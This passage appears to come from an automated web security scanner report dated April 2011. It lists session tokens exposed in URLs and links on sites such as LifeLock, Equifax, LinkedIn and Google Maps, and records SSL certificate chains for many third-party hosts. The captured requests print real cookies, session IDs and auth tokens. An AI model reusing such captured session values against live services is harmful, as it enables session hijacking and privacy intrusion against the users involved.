GET /kh?v=84&hl=en-US&x=736&y=451&z=10&token=119040 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: khm0.googleapis.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:50:55 GMT
Expires: Mon, 23 Apr 2012 16:50:55 GMT
Cache-Control: public, max-age=31536000
Last-Modified: Fri, 1 Jan 2010 01:00:00 GMT
Content-Type: image/jpeg
X-Content-Type-Options: nosniff
Server: btfe
Content-Length: 13694
X-XSS-Protection: 1; mode=block

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222..........."..............................
...[SNIP]...

12.5. http://khm1.googleapis.com/kh  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://khm1.googleapis.com
Path:   /kh

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /kh?v=84&hl=en-US&x=735&y=451&z=10&token=8928 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: khm1.googleapis.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:50:58 GMT
Expires: Mon, 23 Apr 2012 16:50:58 GMT
Cache-Control: public, max-age=31536000
Last-Modified: Fri, 1 Jan 2010 01:00:00 GMT
Content-Type: image/jpeg
X-Content-Type-Options: nosniff
Server: btfe
Content-Length: 14957
X-XSS-Protection: 1; mode=block

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222..........."..............................
...[SNIP]...

12.6. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=45b958e5-3cbb-490b-a0bb-7b95b77a9cd7&hostname=www.identitymanagement.com&location=%2F&url=http%3A%2F%2Fwww.identitymanagement.com%2F%3F_kk%3Didentity%2520management%26_kt%3Dd37d8c67-315a-4919-abfc-41011051bd9e%26gclid%3DCJvKs4D1tagCFeJ95Qodoi78Dg&sessionID=1303674256096.89428&fpc=d2bf4f9-12f890a7ae0-3ca0d667-1&ts1303674262257.0 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.identitymanagement.com/?_kk=identity%20management&_kt=d37d8c67-315a-4919-abfc-41011051bd9e&gclid=CJvKs4D1tagCFeJ95Qodoi78Dg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Sun, 24 Apr 2011 19:46:01 GMT
Connection: keep-alive


12.7. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/AuthenticationService.Authenticate?1sabout%3Ablank&callback=_xdc_._plzwrg&token=102645 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.googleapis.com

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sun, 24 Apr 2011 16:47:55 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 37

_xdc_._plzwrg && _xdc_._plzwrg( [1] )

12.8. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/StaticMapService.GetMapImage

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/StaticMapService.GetMapImage?1m2&1i144781&2i91515&2e1&3u10&4m2&1u500&2u270&5m3&1e0&2b1&5sen-US&token=24544 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.googleapis.com

Response

HTTP/1.1 200 OK
Content-Type: image/png
Date: Sun, 24 Apr 2011 16:47:41 GMT
Expires: Mon, 25 Apr 2011 16:47:41 GMT
Server: staticmap
Content-Length: 36944
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 1

.PNG
.
...IHDR.............H......zPLTE.........///>>>NNN^^^nnnR.:b.Fj.Rv.^.jv...v+.2..v........'..:..2..:.....#..+..2..:..N..V..v......{..{....B..F..v....................................
...[SNIP]...

12.9. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/ViewportInfoService.GetViewportInfo

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/ViewportInfoService.GetViewportInfo?1m6&1m2&1d20.072944084517587&2d77.93291173828129&2m2&1d21.11422639607682&2d79.99284826171879&2u10&4sen-US&5e0&callback=_xdc_._hj4orv&token=21018 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.googleapis.com

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sun, 24 Apr 2011 16:47:55 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 420

_xdc_._hj4orv && _xdc_._hj4orv( ["",null,[[19,[[-90,-180],[90,180]]],[18,[[-90,-180],[90,180]]],[9,[[-90,-180],[90,180]]],[8,[[-90,-180],[90,180]]],[14,[[16.00000370000001,59.99999990000001],[80,144.0
...[SNIP]...

12.10. http://mt0.googleapis.com/mapslt/ft  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mt0.googleapis.com
Path:   /mapslt/ft

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mapslt/ft?hl=en-US&lyrs=m%7Cundefined%7Cos%3A1108961508&las=twtuuutwut,twtuuutwuu,twtuuutwuv,twtuuutwuw,twtuuutwwt,twtuuutwwu&z=10&src=apiv3&xc=1&callback=_xdc_._63pa0o&token=7717 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mt0.googleapis.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:49:35 GMT
Expires: Sun, 24 Apr 2011 16:49:35 GMT
Cache-Control: private, max-age=3600
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Server: maptiles-versatile
X-XSS-Protection: 1; mode=block
Content-Length: 291

_xdc_._63pa0o && _xdc_._63pa0o([{id:"twtuuutwut",zrange:[10,10],layer:"m"},{id:"twtuuutwuu",zrange:[10,10],layer:"m"},{id:"twtuuutwuv",zrange:[10,10],layer:"m"},{id:"twtuuutwuw",zrange:[10,10],layer:"
...[SNIP]...

12.11. http://mt1.googleapis.com/mapslt/ft  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mt1.googleapis.com
Path:   /mapslt/ft

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mapslt/ft?hl=en-US&lyrs=m%7Cundefined%7Cos%3A1108961508&las=vutuwvtwwt,vutuwvtwwu,vutuwvtwwv,vutuwvtwww,vutuwvuvvt,vutuwvuvvv,vutuwvvuut,vutuwvvuuu,vutuwvwttt&z=10&src=apiv3&xc=1&callback=_xdc_._bct9ci&token=40716 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mt1.googleapis.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:48:41 GMT
Expires: Sun, 24 Apr 2011 16:48:41 GMT
Cache-Control: private, max-age=3600
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Server: maptiles-versatile
X-XSS-Protection: 1; mode=block
Content-Length: 420

_xdc_._bct9ci && _xdc_._bct9ci([{id:"vutuwvtwwt",zrange:[10,10],layer:"m"},{id:"vutuwvtwwu",zrange:[10,10],layer:"m"},{id:"vutuwvtwwv",zrange:[10,10],layer:"m"},{id:"vutuwvtwww",zrange:[10,10],layer:"
...[SNIP]...

12.12. http://polls.linkedin.com/vote/131808/nzkbm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://polls.linkedin.com
Path:   /vote/131808/nzkbm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /vote/131808/nzkbm HTTP/1.1
Host: polls.linkedin.com
Proxy-Connection: keep-alive
Referer: http://smartcompanygrowth.com/bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/?gclid=CObW5ui1tqgCFUff4Aod4lhLCg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=23068709.1303163602.1.1.utmcsr=rockyou.com|utmccn=(referral)|utmcmd=referral|utmcct=/rymini/; __qca=P0-87169230-1303163602430; bcookie="v=1&4d9675db-dcd4-4b34-bfd9-5f98cf2c89da"; __utma=23068709.2028061763.1303163602.1303312647.1303561523.3; __utmv=23068709.guest

Response

HTTP/1.1 200 OK
ETag: "ab88a6cd6a6471927b5e24e258e6139e"
Cache-Control: max-age=0, private, must-revalidate
X-UA-Compatible: IE=Edge,chrome=1
X-Runtime: 0.006000
Content-Type: text/html;charset=utf-8
Content-Length: 3294
Date: Mon, 25 Apr 2011 00:48:06 GMT

<!DOCTYPE html>
<html>
<head>
<title>LinkedIn Polls</title>

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link href="http://polls-cdn.linkedin.com/stylesheets/public/
...[SNIP]...
<span class='linked-user fn n'>
<a href="http://www.linkedin.com/profile?viewProfile=&amp;key=39787511&amp;authToken=tcBS&amp;authType=name&amp;trk=api*p1153*" target="top">Karl Walinskas</a>
...[SNIP]...

12.13. https://secure.lifelock.com/portal/login  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.lifelock.com
Path:   /portal/login

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /portal/login HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.1.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; 480-CT=3114#4/24/2011/2/56/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:09:21 GMT
Set-Cookie: JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; Path=/
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:24:21 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461; Path=/
Vary: Accept-Encoding
Content-Length: 5371

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>LifeLock Member Portal | Sign In</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" med
...[SNIP]...
<br />
                   <a href="../portal/account-reset;jsessionid=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000"><i>
...[SNIP]...
<h3>Not a Member? <a href="../enrollment/;jsessionid=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000" name="linkWebstore">Enroll Now</a>
...[SNIP]...

12.14. http://www.apture.com/js/apture.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.apture.com
Path:   /js/apture.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /js/apture.js?siteToken=4dGf14t HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Expires: Mon, 25 Apr 2011 01:37:27 GMT
Last-Modified: Mon, 25 Apr 2011 01:37:27 GMT
Etag: "8d945e580d999bbe5702f570b02fd4bf"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Set-Cookie: AC=SkiS2H7dvV; Domain=.apture.com; expires=Sun, 17-Jan-2037 19:14:07 GMT; Path=/
Content-Length: 3714
Date: Mon, 25 Apr 2011 01:37:27 GMT


(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="http://www.infusionblog.com/";A.visitId=253300774889195;A.abtests={};A.userCookieId=null;
A.siteToken="4dG
...[SNIP]...

12.15. https://www.econsumer.equifax.com/otc/landing.ehtml  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.econsumer.equifax.com
Path:   /otc/landing.ehtml

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /otc/landing.ehtml?%255estart=&companyName=cj_esnp3r&AID=10751987&PID=1911961&SID=gid9a%2bidentity%2btheft%2bresource_ordering34--2011-04-23--20-10-04CD1 HTTP/1.1
Host: www.econsumer.equifax.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 03:12:19 GMT
Content-type: text/html;charset=ISO-8859-1
X-powered-by: Servlet/2.4 JSP/2.0
Set-cookie: JSESSIONID=857e5247922609777fdaaf17d37b; Path=/otc; Secure
Set-cookie: JROUTE=ush2; Path=/otc; Secure
Content-Length: 76392


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Equifax Per
...[SNIP]...
</a> &nbsp;|&nbsp;
       <a href="sitepage.ehtml;jsessionid=857e5247922609777fdaaf17d37b:ush2?forward=elearning_credit14">FCRA</a>
...[SNIP]...

12.16. http://www.infusionblog.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.infusionblog.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.infusionblog.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding,Cookie,User-Agent
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 01:37:12 GMT
Expires: Mon, 25 Apr 2011 01:42:22 GMT
Pragma: public
Connection: Keep-Alive
Set-Cookie: X-Mapping-glbfbjch=6C1FE170452DF50DF4E2477FF60172A1; path=/
Last-Modified: Mon, 25 Apr 2011 00:42:22 GMT
Content-Length: 38973

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
</script> <script id="aptureScript" type="text/javascript" src="http://www.apture.com/js/apture.js?siteToken=4dGf14t" charset="utf-8"></script>
...[SNIP]...

13. SSL certificate  previous  next
There are 31 instances of this issue:


13.1. https://login.silverlight.net/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /

Issue detail

The following problems were identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  CN=*.silverlight.net
Issued by:  Microsoft Secure Server Authority
Valid from:  Mon Jun 28 18:33:00 CDT 2010
Valid to:  Tue Jun 28 18:33:00 CDT 2011

Certificate chain #1

Issued to:  CN=Microsoft Secure Server Authority,DC=redmond,DC=corp,DC=microsoft,DC=com
Issued by:  CN=Microsoft Internet Authority
Valid from:  Wed May 19 17:13:30 CDT 2010
Valid to:  Mon May 19 17:23:30 CDT 2014

Certificate chain #2

Issued to:  CN=Microsoft Internet Authority
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Apr 14 13:12:26 CDT 2010
Valid to:  Sat Apr 14 13:12:14 CDT 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

13.2. https://secure.identityguard.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  secure.identityguard.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Mar 02 18:00:00 CST 2011
Valid to:  Sat Mar 02 17:59:59 CST 2013

13.3. https://secure.krypt.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  secure.krypt.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Tue Dec 09 21:29:24 CST 2008
Valid to:  Fri Dec 09 21:29:24 CST 2011

13.4. https://vault.krypt.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://vault.krypt.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  vault.krypt.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Tue Nov 18 11:24:41 CST 2008
Valid to:  Fri Nov 18 11:24:41 CST 2011

13.5. https://www.facebook.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  www.facebook.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Sun Nov 14 18:00:00 CST 2010
Valid to:  Mon Dec 02 17:59:59 CST 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

13.6. https://www.senderscore.org/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.senderscore.org
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  www.senderscore.org
Issued by:  DigiCert High Assurance EV CA-1
Valid from:  Tue Jul 13 19:00:00 CDT 2010
Valid to:  Mon Jul 18 18:59:59 CDT 2011

Certificate chain #1

Issued to:  DigiCert High Assurance EV CA-1
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Thu Nov 09 18:00:00 CST 2006
Valid to:  Tue Nov 09 18:00:00 CST 2021

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

13.7. https://cam.infusionsoft.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cam.infusionsoft.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.infusionsoft.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Jun 12 15:05:52 CDT 2010
Valid to:  Mon Aug 13 19:23:24 CDT 2012

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

13.8. https://crm.infusionsoft.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://crm.infusionsoft.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.infusionsoft.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Jun 12 15:05:52 CDT 2010
Valid to:  Mon Aug 13 19:23:24 CDT 2012

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

13.9. https://inter.viewcentral.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.viewcentral.com
Issued by:  Network Solutions Certificate Authority
Valid from:  Thu Jan 27 18:00:00 CST 2011
Valid to:  Fri Feb 17 17:59:59 CST 2012

Certificate chain #1

Issued to:  Network Solutions Certificate Authority
Issued by:  UTN-USERFirst-Hardware
Valid from:  Sun Apr 09 19:00:00 CDT 2006
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  UTN-USERFirst-Hardware
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 03:09:10 CDT 2005
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

13.10. https://login.live.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  login.live.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Mon Oct 04 19:00:00 CDT 2010
Valid to:  Wed Oct 05 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.11. https://membership.identitymonitor.citi.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://membership.identitymonitor.citi.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  membership.identitymonitor.citi.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Sep 16 19:00:00 CDT 2009
Valid to:  Sat Sep 17 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.12. https://online.americanexpress.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  online.americanexpress.com
Issued by:  VeriSign Class 3 Secure OFX CA - G3
